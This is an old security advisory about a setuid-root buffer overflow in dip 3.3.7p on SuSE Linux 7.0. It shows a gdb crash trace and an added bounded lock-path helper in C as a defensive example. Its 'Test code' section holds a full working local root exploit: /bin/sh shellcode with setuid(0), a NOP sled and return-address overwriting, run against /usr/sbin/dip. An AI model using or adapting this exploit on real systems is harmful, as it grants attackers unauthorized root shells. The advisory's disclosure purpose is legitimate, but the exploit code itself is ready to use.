
Buffer overflow vulnerability in dip 3.3.7p


Published: 2001-07-10
Updated: 2001-07-10
Severity:
Threat level: local administrator privileges
Error type: input validation error
Exploitation method: server mode

Affected systems
dip 3.3.7p-
SuSE linux 7.0 x86
Detailed description
On SuSE linux 7.0 x86, /usr/sbin/dip is installed setuid root by default,
and a buffer overflow exists in its handling of the -l argument.

root@faust:/home/hegi > gdb /usr/sbin/dip
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-suse-linux"...(no debugging symbols found)...
(gdb) run -k -l `perl -e 'print "a" x 130 '`
Starting program: /usr/sbin/dip -k -l `perl -e 'print "a" x 130 '`
DIP: Dialup IP Protocol Driver version 3.3.7p-uri (25 Dec 96)
Written by Fred N. van Kempen, MicroWalt Corporation.


DIP: cannot open /var/lock/LCK..aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Datei oder Verzeichnis nicht gefunden


Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
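
The error message above shows the -l value being appended to /var/lock/LCK.. before the crash. The following is an added example, not code from the advisory or from dip itself: a bounded way to build such a lock-file path in C. The function name, the 128-byte buffer size and the allowed character set are assumptions.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

#define LOCK_PREFIX   "/var/lock/LCK.."  /* prefix seen in the error message */
#define LOCK_PATH_MAX 128                /* assumed fixed buffer size */

/* Unsafe pattern, shown for comparison only and never compiled in:
 *     char path[LOCK_PATH_MAX];
 *     sprintf(path, "%s%s", LOCK_PREFIX, line);    no bound on line
 */

/* Hypothetical hardened helper. Returns 0 and fills out on success,
 * -1 if line is rejected; never writes past out[outlen - 1]. */
int build_lock_path(const char *line, char *out, size_t outlen)
{
    size_t i;
    int n;
    if (line == NULL || out == NULL || outlen == 0)
        return -1;
    out[0] = '\0';
    if (line[0] == '\0')
        return -1;
    /* Allow only characters expected in a tty name (assumed policy);
     * this also rejects '/' and '.', so no path traversal. */
    for (i = 0; line[i] != '\0'; i++) {
        unsigned char c = (unsigned char)line[i];
        if (!isalnum(c) && c != '_' && c != '-')
            return -1;
    }
    /* snprintf reports the length it needed; treat truncation as an error. */
    n = snprintf(out, outlen, "%s%s", LOCK_PREFIX, line);
    if (n < 0 || (size_t)n >= outlen) {
        out[0] = '\0';
        return -1;
    }
    return 0;
}

int main(void)
{
    char path[LOCK_PATH_MAX], big[131];
    memset(big, 'a', 130);   /* constructed input: 130 'a' bytes, as in the gdb run */
    big[130] = '\0';
    printf("ttyS0 -> %d\n", build_lock_path("ttyS0", path, sizeof path));
    printf("130 x 'a' -> %d\n", build_lock_path(big, path, sizeof path));
    return 0;
}
```

A setuid program should reject the over-long argument and exit instead of truncating it, since a truncated name could refer to a different lock file.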

Test code
/* Linux x86 dip 3.3.7p exploit by pr10n */


#include <stdio.h>

#define NOP 0x90


/*thanks to hack.co.za*/
char shellcode[] =
          "\x31\xc0\x31\xdb\x31\xc9\xb0\x46\xcd\x80\xeb\x1d"
          "\x5e\x88\x46\x07\x89\x46\x0c\x89\x76\x08\x89\xf3"
          "\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\x31\xc0"
          "\x31\xdb\x40\xcd\x80\xe8\xde\xff\xff\xff/bin/sh";



unsigned long get_sp(void){ __asm__("movl %esp, %eax");}

main(int argc, char *argv[]){

char buf[136];
int i;
int offset=0,*ptr;
long ret;


if(argc!=2){
printf("usage: %s offset\n",argv[0]);
exit(0);}

offset=atoi(argv[1]);

ret=(get_sp()-offset);

for(i=1;i<136;i+=4){
*(long *)&buf[i]=ret;}

printf("\nusing: 0x%x\n\n",ret);

for(i=0;i<(sizeof(buf)-strlen(shellcode)-40);i++)
buf[i]=NOP;

memcpy(buf+i,shellcode,strlen(shellcode));

execl("/usr/sbin/dip","dip","-k","-l",buf,(char *)0);


}

Solution
None yet

Related information